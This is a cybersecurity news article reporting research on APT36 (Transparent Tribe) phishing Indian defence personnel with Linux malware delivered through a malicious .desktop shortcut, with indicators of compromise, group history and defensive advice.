Pakistan’s Transparent Tribe Hits Indian Defence with Linux Malware

A sophisticated cyber espionage operation, believed to be run by a group known as APT36 (also called Transparent Tribe), is now targeting Indian defence personnel and organizations. This Pakistan-based group is targeting systems running BOSS Linux, a version of the Linux operating system commonly used by Indian government agencies.

This shows a new step in their attacks since they’re now using malicious software designed specifically for Linux environments. This threat was reported by cybersecurity firm Cyfirma, and the findings were shared with Hackread.com.

Cyfirma researchers first observed this new attack on June 7, 2025. As per their research, the attackers are employing cunning phishing emails to trick their targets. These emails come with a compressed file, typically an archived ZIP file “Cyber-Security-Advisory.zip,” which contains a harmful ‘.desktop’ file– essentially a shortcut used in Linux systems.

When a victim opens this shortcut, two things happen at once. First, to create a diversion, a normal-looking PowerPoint file appears, seemingly to distract the user and make the attack seem legitimate. This is achieved by the .desktop file secretly downloading and then opening the PowerPoint file.

Second, in the background, another malicious program (named BOSS.elf, saved locally as client.elf) is secretly downloaded and run. This hidden program is an Executable and Linkable Format (ELF) binary, which is a standard file format for executable programs on Linux, just like an .exe file on Windows. It is written in the Go programming language and serves as the primary payload designed to compromise the host system and facilitate unauthorized access.

The malware also attempts to connect to a control server at the IP address 101.99.92.182 on port 12520. It’s important to note that the domain sorlastore.com has been identified by security researchers as malicious infrastructure actively used by APT36, particularly against personnel and systems within the Indian defence sector.

This multi-step attack is designed to get past security checks and avoid being noticed, allowing the attackers to maintain access to sensitive computer systems. The use of malware specifically built for Linux shows that APT36’s capabilities are growing, posing a greater danger to vital government and defence computer networks.

Hackread.com has diligently monitored the activities of the Transparent Tribe since its emergence. They gained prominence with Operation C-Major in March 2016, which used spear-phishing and an Adobe Reader vulnerability to distribute spyware to Indian military employees and steal login details from Indian army officials via a malicious Android app called SmeshApp.

More recently, in July 2024, the group was observed disguising Android spyware CapraRAT as popular mobile apps like “Crazy Games” and “TikTok” to steal data. This latest campaign indicates an expansion of their targets beyond just military personnel and also highlights their continued dedication to Indian targets and their adaptable approach to exploiting various platforms.

Therefore, organizations, especially those in the public sector using Linux-based systems, are urged to take this threat very seriously. Strong cybersecurity measures and threat detection tools are crucial to protect against these evolving attacks.

“Even a PowerPoint presentation has the power to help automate, but it should only do so when you know it’s legitimate,“ emphasised Jason Soroko, Senior Fellow at Sectigo, a Scottsdale, Arizona-based provider of comprehensive certificate lifecycle management (CLM).

“Prevention improves when BOSS Linux images disable the auto-execution of desktop shortcuts and enforce application-allow lists that limit what runs outside signed repositories,“ “PowerPoint viewers should open in read-only mode and downloads from untrusted networks should land in a no-execute mount. Zero trust segmentation keeps a compromised workstation isolated from classified enclaves,“ Jason advised.